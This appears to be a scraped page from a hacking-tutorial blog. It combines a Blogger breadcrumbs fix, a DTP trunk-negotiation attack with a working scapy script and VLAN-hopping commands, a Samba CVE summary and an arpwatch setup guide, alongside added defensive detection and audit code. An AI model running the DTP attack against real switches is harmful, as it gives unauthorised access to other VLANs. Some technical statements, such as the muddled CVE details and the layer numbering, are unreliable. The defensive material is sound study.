    Guys, before fixing the Breadcrumbs Error, let me tell you that this problem is very small and very easy to fix. But once the breadcrumbs issue appears, your post indexing stops completely, so your posts are not indexed and traffic also decreases. So let's learn what the breadcrumbs issue is and how to fix it step by step.



    First of all, as you can see, we got a mail from Google Search Console..


    Fix Breadcrumbs Error fix on blogger

     

    Step 1- If you have not logged in to Blogger, then first go to Blogger and log in.

    Step 2- Now go to the Posts section and search for the article post in which your breadcrumbs error occurred.


    Step 3- Then look at the Labels section on the right side, where you don't have any label (a label is like a category).



    Fix Breadcrumbs Error fix on blogger



    Step 4- Add a label like this, or otherwise update the existing one.



    Fix Breadcrumbs Error fix on blogger



    Step 5- Now go to the Google Search Console page and, on the left side, click on the Breadcrumbs option.


    Step 6- Copy the URL of the breadcrumbs-affected page and paste it here in Search Console.


    Fix Breadcrumbs Error fix on blogger


    Step 7- A message appears: URL is on Google (indexed) but has some issues.



    Fix Breadcrumbs Error fix on blogger


    Step 8- Then click on Test Live URL.


    Fix Breadcrumbs Error fix on blogger

    Step 9- Hurrah! Finally click on Save, and after waiting a few seconds the theme will be updated.


    Fix Breadcrumbs Error fix on blogger



    Step 10- After this, go back to Google Search Console, go to Breadcrumbs and click on START NEW VALIDATION. After that, wait for a week and your breadcrumbs error problem will be solved.



    Fix Breadcrumbs Error fix on blogger


    If you face any problem in correcting the breadcrumbs issue even after this article, then you can ask me by commenting.





  • Code Your Own DTP Abusing layer 2 protocol

     


     

    DTP Abusing

    DTP stands for Dynamic Trunking Protocol. It is a Cisco proprietary layer 2 protocol, meaning it works only between Cisco devices and operates at layer 2 of the OSI model. It is used to form a trunk automatically between two switches, and the DTP feature is enabled by default on Cisco switches.


    So, let's understand the modes in DTP -


    By default, whenever you buy a new switch, its ports are in dynamic auto or dynamic desirable mode. Let's understand them one by one, starting with dynamic auto.


    Dynamic Auto :- In this mode the switchport waits for the neighbor to initiate in order to form a trunk. Ports in dynamic auto mode never initiate trunk formation themselves; they can become a trunk, but only when the neighbor initiates.



    Dynamic Desirable :- In this mode the switchport actively participates in forming a trunk: a port in dynamic desirable mode initiates the negotiation itself and forms the trunk. Along with the trunk, the encapsulation is also negotiated between the two switches. Let me show you with the help of the figures below.



    So, here one port is in dynamic auto mode and the other is also in dynamic auto. They will exchange DTP messages, but nobody will initiate, because both are in dynamic auto mode; ports in dynamic auto mode cannot initiate trunk formation, so in this case no trunk is formed.

     

    Code Your Own DTP Abusing layer 2 protocol


    Here the dynamic desirable (DD) port also sends DTP messages. A DD port initiates trunk formation, and when the neighbor initiates, the DD port accepts as well, so they form the trunk; in this case the trunk is formed dynamically between the two switches.

     

     

    Code Your Own DTP Abusing layer 2 protocol

     



    Here they will exchange DTP messages and both of them will initiate.
     


    Code Your Own DTP Abusing layer 2 protocol




    Additional detail - a short refresher:

    Ethernet is on Layer 2, IP (Internet Protocol) on Layer 3, TCP (Transmission Control Protocol) or UDP on Layer 4–6 and services like HTTP, SMTP, FTP on Layer 7.



    Also read -


    Code Your Own ARP Spoofing Over VLAN Hopping - CLICK HERE
    Code your own MAC Flooding Tool - CLICK HERE
    Defend ARP poisoning attacks - CLICK HERE
    Code your own ARP Cache Poisoning - CLICK HERE




    Because DTP completely overlooks any kind of security, we can send a single Dynamic-Desirable packet to any DTP-enabled Cisco device and ask it to change our port into a trunk port.



    Code Your Own DTP Packet


    #!/usr/bin/python3
    # Sends one DTP frame with status "dynamic desirable" on the given interface.
    # negotiate_trunk(iface, mymac=None) comes from scapy's DTP contrib module.
    import sys
    from scapy.layers.l2 import Dot3, LLC, SNAP
    from scapy.contrib.dtp import *
    
    if len(sys.argv) < 2:
        print(sys.argv[0] + " <dev>")
        sys.exit()
    
    # mymac is optional: the MAC of the spoofed neighbor switch (random if omitted)
    negotiate_trunk(iface=sys.argv[1])
    




    As an optional parameter you can set the MAC address of the spoofed neighbor switch; if none is set, a random one is generated automatically.

     

    The attack can take some minutes, but an attacker doesn't care about the delay, because they know what they get in exchange: the possibility to connect to every VLAN!



    • sudo vconfig add eth0 <vlan-id>
    • sudo ifconfig eth0.<vlan-id> <ip_of_vlan> up


    example -

    • vconfig add wlan0 1
    • ifconfig wlan0.1 192.168.13.15 up



    NOTE- <ip_of_vlan> means an IP address of your choice, as per your need.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$ sudo vconfig add wlan0 1                                                                                                                                                            2 ⚙
    [sudo] password for hackerboy: 
    
    Warning: vconfig is deprecated and might be removed in the future, please migrate to ip(route2) as soon as possible!
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$ sudo ifconfig wlan0.1 192.168.13.15 up                                                                                                                                              2 ⚙
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$                                                                                                                                                                                     2 ⚙
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$ ifconfig                                                                                                                                                                            2 ⚙
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            inet6 2409:4064:195:1000:288e:7e35:5b22:f417  prefixlen 64  scopeid 0x0<global>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 89316  bytes 69611668 (66.3 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 74658  bytes 42465996 (40.4 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0.1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.13.15  netmask 255.255.255.0  broadcast 192.168.13.255
            inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20<link>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 6  bytes 516 (516.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
    └─$                                    
    



    Now we can run the program on the wlan0.1 interface (see the code above).


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ sudo python3 dtp-trunk.py wlan0.1            
    [sudo] password for hackerboy: 
    Trying to negotiate a trunk on interface wlan0.1
    .
    Sent 1 packets.
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ 
    
    
    
    


    Code Your Own DTP Abusing layer 2 protocol
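    From the defender's side, the frame that negotiate_trunk() emits is easy to recognise on the wire. The following is an added example, not code from the post or from scapy: a pure-Python decoder for DTP frames plus the check a monitor on a host-facing access port would run. The sample frames, the host MAC 00:11:22:33:44:55 and the domain name "lab" are constructed; the status-byte decoding (on, off, desirable, auto in the low bits, the trunking flag in bit 7) follows the convention used by common protocol dissectors.

```python
"""Decode DTP frames and flag the ones a host-facing (access) port should never carry."""
import struct
from typing import Dict, List, Optional

# Wire constants: DTP rides in 802.3/LLC/SNAP with the Cisco OUI and PID 0x2004 and is
# sent to the 01:00:0c:cc:cc:cc multicast group (the same frame the scapy script above builds).
DTP_GROUP = bytes.fromhex("01000ccccccc")
CISCO_OUI = bytes.fromhex("00000c")
DTP_PID = 0x2004
TLV_DOMAIN, TLV_STATUS, TLV_TYPE, TLV_NEIGHBOR = 1, 2, 3, 4
# Status byte: low bits carry the administrative mode, bit 7 says the port is currently trunking.
TAS_NAMES = {1: "on", 2: "off", 3: "desirable", 4: "auto"}
TOS_TRUNKING = 0x80


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_dtp(frame: bytes) -> Optional[Dict]:
    """Return the decoded DTP fields, or None when the frame is not DTP.

    A truncated or malformed DTP frame also yields None: a monitor that sits on a port an
    attacker controls must never crash on hostile input.
    """
    if len(frame) < 23:
        return None
    dst, src = frame[:6], frame[6:12]
    length = struct.unpack("!H", frame[12:14])[0]
    # > 1500 means an Ethernet II type field, not an 802.3 length; < 9 leaves no DTP body
    if length > 1500 or length < 9 or 14 + length > len(frame):
        return None
    if frame[14:17] != b"\xaa\xaa\x03" or frame[17:20] != CISCO_OUI:
        return None
    if struct.unpack("!H", frame[20:22])[0] != DTP_PID:
        return None
    body = frame[22:14 + length]
    tlvs: Dict[int, bytes] = {}
    off = 1                                              # body[0] is the DTP version
    while off < len(body):
        if off + 4 > len(body):
            return None
        tlv_type, tlv_len = struct.unpack("!HH", body[off:off + 4])
        if tlv_len < 4 or off + tlv_len > len(body):     # length covers type+length+value
            return None
        tlvs[tlv_type] = body[off + 4:off + tlv_len]
        off += tlv_len
    status = tlvs.get(TLV_STATUS, b"\x00")[0]
    neighbor = tlvs.get(TLV_NEIGHBOR, b"")
    return {
        "src": mac_str(src),
        "to_dtp_group": dst == DTP_GROUP,
        "version": body[0],
        "domain": tlvs.get(TLV_DOMAIN, b"").rstrip(b"\x00").decode("ascii", "replace"),
        "admin_status": TAS_NAMES.get(status & 0x07, f"unknown({status & 0x07})"),
        "operating_trunk": bool(status & TOS_TRUNKING),
        "encap_raw": tlvs.get(TLV_TYPE, b"").hex(),      # type/encapsulation byte, kept raw
        "neighbor": mac_str(neighbor) if len(neighbor) == 6 else "",
    }


def access_port_alerts(frames: List[bytes]) -> List[str]:
    """Defender check for a port wired to an end host: it should see no DTP at all.

    Every DTP frame is reported; 'desirable' or 'on' is the exact signature of the
    trunk negotiation the post demonstrates, so it is rated HIGH.
    """
    alerts = []
    for frame in frames:
        info = parse_dtp(frame)
        if info is None:
            continue
        severity = "HIGH" if info["admin_status"] in ("desirable", "on") else "MEDIUM"
        alerts.append(f"{severity}: DTP from {info['src']} admin_status={info['admin_status']} "
                      f"domain='{info['domain']}' neighbor={info['neighbor']}")
    return alerts


# Constructed sample frames (not captured from the post). The first is what the scapy
# script above puts on the wire: version 1, a domain TLV, status 0x03 (not trunking yet,
# asking to become a trunk: 'desirable'), the type TLV, and a neighbor TLV naming the sender.
DTP_DESIRABLE = bytes.fromhex(
    "01000ccccccc" "001122334455" "0025"   # dst group, src, 802.3 length = 37
    "aaaa03" "00000c" "2004"               # LLC + SNAP: Cisco OUI, PID 0x2004
    "01"                                   # DTP version
    "00010008" "6c616200"                  # TLV 1 domain "lab\0"
    "00020005" "03"                        # TLV 2 status: not trunking, desirable
    "00030005" "a5"                        # TLV 3 type/encapsulation
    "0004000a" "001122334455"              # TLV 4 neighbor: the sender's own MAC
)
# An ordinary ARP request from the same host (Ethernet II, type 0x0806) must be ignored.
ARP_REQUEST = bytes.fromhex("ffffffffffff" "001122334455" "0806") + bytes(28)

if __name__ == "__main__":
    for alert in access_port_alerts([ARP_REQUEST, DTP_DESIRABLE]):
        print(alert)
```

    On the switch itself the same exposure is removed by hard-coding host ports as access ports with negotiation off (switchport mode access / switchport nonegotiate), so the frame above is simply never answered.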






  • Critical samba bug lurking in your system

     

    Critical samba bug lurking in your system CVE-2021-44141

     


    Critical samba bug lurking in your system CVE-2021-44141 and CVE-2022-0336


    Understanding SMB


    SMB - Server Message Block Protocol - is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. [source] Learn about, then enumerate and exploit a variety of network services and misconfigurations.
     
    Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers. The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX.

    How does SMB work?



    Critical samba bug lurking in your system CVE-2021-44141 and CVE-2022-0336




    Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.


     

    Also read- All about SMB and enum4linux with Questions/Answer

     

    Also read- Samba and exploitation too



    Samba Active Directory


    The Samba AD DC includes checks when adding service principal names (SPNs) to an account to ensure that SPNs do not alias with those already in the database. Some of these checks can be bypassed if an account modification re-adds an SPN that was previously present on that account, such as one added when a computer is joined to a domain. An attacker who has the ability to write to an account can exploit this to perform a denial-of-service attack by adding an SPN that matches an existing service. Additionally, an attacker who can intercept traffic can impersonate existing services, resulting in a loss of confidentiality and integrity.




    According to the CERT Coordination Center (CERT/CC), the flaw also affects widely used Linux distributions such as Red Hat, SUSE Linux, and Ubuntu.

    The vulnerability, rated 9.9 on the CVSS scale, has been credited to security researcher Orange Tsai from DEVCORE, who last year disclosed the widely-exploited flaws in Microsoft Exchange Server. Additionally, the fix has been issued in Samba versions 4.14.12 and 4.15.5.



    Samba administrators are advised to upgrade to the latest releases (4.13.17, 4.14.12, and 4.15.5) or apply a patch as soon as possible. Mitigation short of patching would involve changing Samba configuration files so that the vulnerable vfs_fruit module doesn’t run. “The specific flaw exists within the parsing of EA metadata when opening files in SMBD,” an advisory on the flaw from developers of Samba explains.

    Write access to extended file attributes is needed in order to exploit the flaw, but such permissions are also granted to guest or unauthenticated users.




    Also addressed by Samba are two additional flaws —


    • CVE-2021-44141 (CVSS score: 4.2) - Information leak via symlinks of existence of files or directories outside of the exported share (Fixed in Samba version 4.15.5)


    • CVE-2022-0336 (CVSS score: 3.1) - Samba AD users with permission to write to an account can impersonate arbitrary services (Fixed in Samba versions 4.13.17, 4.14.12, and 4.15.4)



    Samba administrators are recommended to upgrade to these releases or apply the patch as soon as possible to mitigate the defect and thwart any potential attacks exploiting the vulnerability.
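    The advice above (upgrade to 4.13.17, 4.14.12 or 4.15.5, or stop loading vfs_fruit until you can) turned into a check, as an added example that is not part of the post or of Samba: it parses an smb.conf, lists the shares that effectively load fruit, compares the smbd version string against the fixed releases and can emit the hardened configuration. The sample smb.conf and the "Version 4.15.2-Debian" string are constructed, and treating branches newer than 4.15 as fixed and older ones as unfixed is an assumption.

```python
"""Check a Samba host against the fixes listed above: is the running version patched, and if
not, does the configuration still load the vfs_fruit module that the 9.9-rated bug lives in?"""
import configparser
import re
from typing import Dict, List, Tuple

# Fixed releases named in the advisory text above, keyed by (major, minor) branch.
FIXED_PATCH_LEVEL = {(4, 13): 17, (4, 14): 12, (4, 15): 5}
Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    """Pull (major, minor, patch) out of an 'smbd --version' line such as 'Version 4.15.2-Debian'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no Samba version found in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def version_is_fixed(ver: Version) -> bool:
    """True once the branch's fixed patch level is reached.
    Assumption: branches newer than 4.15 ship with the fix; older branches never got one."""
    major, minor, patch = ver
    fixed_patch = FIXED_PATCH_LEVEL.get((major, minor))
    if fixed_patch is None:
        return (major, minor) > (4, 15)
    return patch >= fixed_patch


def load_smb_conf(text: str) -> configparser.ConfigParser:
    # smb.conf is ini-like: '=' is the only separator (keys such as 'fruit:metadata' contain ':'),
    # option names are case-insensitive and may repeat, so strict mode is off.
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    return cp


def shares_loading_fruit(cp: configparser.ConfigParser) -> List[str]:
    """Shares whose effective 'vfs objects' includes fruit; a share without its own line inherits [global]."""
    global_vfs = cp.get("global", "vfs objects", fallback="")
    hits = []
    for share in cp.sections():
        if share.lower() == "global":
            continue
        if "fruit" in cp.get(share, "vfs objects", fallback=global_vfs).split():
            hits.append(share)
    return hits


VFS_LINE = re.compile(r"^(\s*vfs objects\s*=\s*)(.*?)\s*$", re.IGNORECASE)


def remove_fruit_module(conf_text: str) -> str:
    """The mitigation short of patching: drop fruit from every 'vfs objects' line.
    A line left with no modules is removed entirely; everything else is kept verbatim."""
    out = []
    for line in conf_text.splitlines():
        m = VFS_LINE.match(line)
        if not m:
            out.append(line)
            continue
        modules = [mod for mod in m.group(2).split() if mod != "fruit"]
        if modules:
            out.append(m.group(1) + " ".join(modules))
    return "\n".join(out) + "\n"


def audit(conf_text: str, version_text: str) -> Dict:
    ver = parse_version(version_text)
    fixed = version_is_fixed(ver)
    fruit_shares = shares_loading_fruit(load_smb_conf(conf_text))
    if fixed:
        action = "none: running a fixed release"
    elif fruit_shares:
        action = "upgrade now, or remove fruit from 'vfs objects' for: " + ", ".join(fruit_shares)
    else:
        action = "upgrade: vfs_fruit is not loaded, but the two lower-rated fixes still apply"
    return {"version": ver, "version_fixed": fixed, "fruit_shares": fruit_shares, "action": action}


# Constructed smb.conf for a hypothetical host: fruit is enabled globally, so [timemachine]
# inherits it, while [public] overrides the module list and does not load it.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server role = standalone server
   vfs objects = catia fruit streams_xattr
   fruit:metadata = stream

[timemachine]
   path = /srv/tm
   read only = no

[public]
   path = /srv/public
   guest ok = yes
   vfs objects = streams_xattr
"""

if __name__ == "__main__":
    print(audit(SAMPLE_SMB_CONF, "Version 4.15.2-Debian"))
    print(remove_fruit_module(SAMPLE_SMB_CONF))
```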







     

  • Defend ARP poisoning attacks with code your own arpwatcher

     

    Defend ARP poisoning attacks with code your own arpwatcher

     


    My dear Linux lovers, how are you all? Remember us? You were reading about cache poisoning; if you don't remember, it doesn't matter. Don't worry, after this blog you will not forget it, and if you bookmark our website, that is to your benefit. So now, back to our topic.

    So, first of all, let's learn about ARP cache poisoning. The functionality of the ARP (Address Resolution Protocol) was described in another post of ours (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html). A computer that wants to send an IP packet to another host must first request the MAC address of the destination using ARP. This request is broadcast to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world, an attacker may send its victim such an ARP reply every few seconds with its own MAC address as the response, and thus redirect the connection to itself.
     

    For more info about the ARP cache poisoning attack, including a practical demonstration - CLICK HERE

     

     



    Brought to you by Hacking Truth


     

    To defend against ARP poisoning attacks one could, on the one hand, use static ARP entries, but those may get overwritten by received ARP responses depending on the ARP handling code of the operating system; on the other hand, one could use a tool such as an ARP watcher.

    An ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the functionality of your IDS by using the above scripts to see how it behaves.


    So, there are two methods when we talk about ARP watching: the first is to code your own ARP watcher, and the second is to use an inbuilt tool. The choice is yours; both have the same functionality and purpose.

    First we try the inbuilt tool, then we work on coding our own ARP watcher.


    Arpwatch


    Arpwatch is an open-source program that monitors Ethernet traffic activity (like changing IP and MAC addresses) on your network and maintains a database of Ethernet/IP address pairings. It produces a log of the observed IP/MAC address pairings along with timestamps. This tool is especially useful for network administrators who want to keep a watch on ARP activity to detect ARP spoofing or unexpected IP/MAC address changes.


    Let's Install


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
    └─$ sudo apt-get install arpwatch               
    [sudo] password for hackerboy: 
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following NEW packages will be installed:
      arpwatch
    0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
    Need to get 49.0 kB of archives.
    After this operation, 161 kB of additional disk space will be used.
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 arpwatch amd64 2.1a15-8 [49.0 kB]
    Fetched 49.0 kB in 16s (3,125 B/s)  
    Selecting previously unselected package arpwatch.
    (Reading database ... 407952 files and directories currently installed.)
    Preparing to unpack .../arpwatch_2.1a15-8_amd64.deb ...
    Unpacking arpwatch (2.1a15-8) ...
    Setting up arpwatch (2.1a15-8) ...
    update-rc.d: We have no instructions for the arpwatch init script.
    update-rc.d: It looks like a network service, we disable it.
    arpwatch.service is a disabled or a static unit, not starting it.
    Processing triggers for man-db (2.9.4-2) ...
    Processing triggers for kali-menu (2021.4.2) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
    └─$ 
    



    Arpwatch configuration description


    Arpwatch on systemd-based Linux systems does not support a configuration file, but the systemd unit files shipped with Debian allow launching arpwatch with a different configuration on each interface.

    In order to do that, create a file called IFNAME.iface which contains variable assignments in sh syntax (comments are allowed). You can use the following variables to influence the invocation for that specific interface only:


    # ARGS: overwrite the ARGS from /etc/default/arpwatch
    # PCAP_FILTER: overwrite (or set) the pcap filter
    # IFACE_ARGS: additional options to be passed to arpwatch 

                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ cat /etc/default/arpwatch
    # Global options for arpwatch(8).
    
    # do not use the -i, -f or -u options here, they are added automatically
    # Debian: don't report bogons, don't use PROMISC.
    ARGS="-N -p"
    
    # if you want to add a pcap filter, uncomment and adjust the option below (you
    # will need spaces so adding -F to the ARGS above will cause problems). See -F
    # option in man 8 arpwatch for more information
    #PCAP_FILTER="not ether host (00:11:22:33:44:55 or 66:77:88:99:aa:bb)"
    
    # Debian: run as `arpwatch' user.  Empty this to run as root.
    RUNAS="arpwatch"
    
    # when using systemd you have to enable arpwatch explicitly for each interface
    # you want to run it on by running:
    # systemctl enable arpwatch@IFACE
    # systemctl start arpwatch@IFACE
    
    # For the LSB init script, enter a list of interfaces into the list below;
    # arpwatch will be started to listen on these interfaces.
    # Note: This is ignored when using systemd!
    # INTERFACES="eth0 eth1"
    INTERFACES=""
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    



    I have multiple network interfaces on my Debian server and I need to run arpwatch on the wlan0 interface:

          


                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ ifconfig                                                                                                                                                                          130 ⨯
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 688  bytes 61882 (60.4 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 688  bytes 61882 (60.4 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.249.25  netmask 255.255.255.0  broadcast 192.168.249.255
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            inet6 2409:4064:200b:220c:7ad5:600b:2ea3:7963  prefixlen 64  scopeid 0x0<global>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 53817  bytes 30589399 (29.1 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 62412  bytes 47543548 (45.3 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    


    In addition, on the enp5s0 interface I need to monitor changes in MAC addresses not only for the 192.168.12.0/24 local network, but also for the networks 192.168.122.0/24, 192.168.80/24 and 192.168.125.0/24. I need to log MAC address changes to a file and also mail them to arpwatch@mydomain.com.


    Arpwatch configuration


    Go to the /etc/arpwatch directory and create the file wlan0.iface (IFNAME.iface) with this content:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo nano wlan0.iface  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ cat wlan0.iface           
    INTERFACES="wlan0"
    ARGS="-N -p"
    IFACE_ARGS="-m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24"
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    


    Here is man page for arpwatch: https://manpages.debian.org/unstable/arpwatch/arpwatch.8.en.html


    # The -m option is used to specify the e-mail address to which reports will be sent. By default, reports are sent to root on the local machine.

    # The -n flag specifies additional local networks. This can be useful to avoid bogon warnings when there is more than one network running on the same wire. If the optional width/mask is not specified, the default netmask for the network's class is used.

    # The -N flag disables reporting any bogons.

    # The -p flag disables promiscuous operation. ARP broadcasts get through hubs without having the interface in promiscuous mode, while saving considerable resources that would be wasted on processing gigabytes of non-broadcast traffic. Setting promiscuous mode does not mean getting 100% traffic that would concern arpwatch.


    Arpwatch and systemd


    Now you can start arpwatch on the wlan0 interface with the systemctl start command:

     

      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl daemon-reload
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl start arpwatch@wlan0 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
      

     

    You can check the status of the arpwatch daemon:

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ sudo systemctl status arpwatch@wlan0                                                                                                                                                2 ⚙
    ● arpwatch@wlan0.service - arpwatch service on interface wlan0
         Loaded: loaded (/lib/systemd/system/arpwatch@.service; enabled; vendor preset: disabled)
         Active: active (running) since Tue 2022-01-25 18:10:08 IST; 28min ago
           Docs: man:arpwatch(8)
       Main PID: 26295 (arpwatch)
          Tasks: 1 (limit: 4366)
         Memory: 3.1M
            CPU: 745ms
         CGroup: /system.slice/system-arpwatch.slice/arpwatch@wlan0.service
                 └─26295 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 212.158.133.0/24 -F ""
    
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Stopped arpwatch service on interface wlan0.
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: arpwatch@wlan0.service: Consumed 2.360s CPU time.
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Starting arpwatch service on interface wlan0...
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Started arpwatch service on interface wlan0.
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: Running as uid=140 gid=149
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: listening on wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.45 08:00:27:67:67:30 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$    
    
    

     

    new activity – This Ethernet/IP address pair has been used for the first time in six months or more.

    new station – The ethernet address has not been seen before.

    flip flop – The ethernet address has changed from the most recently seen address to the second most recently seen address. If either the old or new ethernet address is a DECnet address and it is less than 24 hours, the email version of the report is suppressed.

    changed ethernet address – The host switched to a new ethernet address.

     

     

     

    Check that arpwatch is running:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ ps aux|grep arp
    hackerb+    4312  0.1  0.4 545140 18244 ?        Sl   08:38   0:03 leafpad /home/hackerboy/Desktop/Penetration-tester-jr/arpcache/arpwatch/arpwatch-content.txt
    root        6365  0.0  0.0  11140  3212 pts/1    S+   08:46   0:00 sudo python3 arpcache.py 192.168.122.45 192.168.122.30
    root        6376  0.1  2.0 129852 76892 pts/1    S+   08:46   0:03 python3 arpcache.py 192.168.122.45 192.168.122.30
    arpwatch   14690  0.0  0.1  13680  6700 ?        S    09:15   0:00 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24 -F
    hackerb+   19812  0.0  0.0   6316  2260 pts/3    S+   09:35   0:00 grep --color=auto arp
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    


    arpwatch after reboot


    You have to enable the arpwatch@wlan0 service unit so that it starts after a system reboot:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl daemon-reload                                                                                                                                                        1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl enable arpwatch@wlan0                                                                                                                                                1 ⚙
    Created symlink /etc/systemd/system/multi-user.target.wants/arpwatch@wlan0.service → /lib/systemd/system/arpwatch@.service.
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$      
    
    


     

    Create the /var/log/arpwatch directory and the file arpwatch.log inside it. Note that chmod 666 makes the log world-writable, so any local user could tamper with this evidence; on a shared host, giving the file to the syslog user with mode 640 is the safer choice.

     

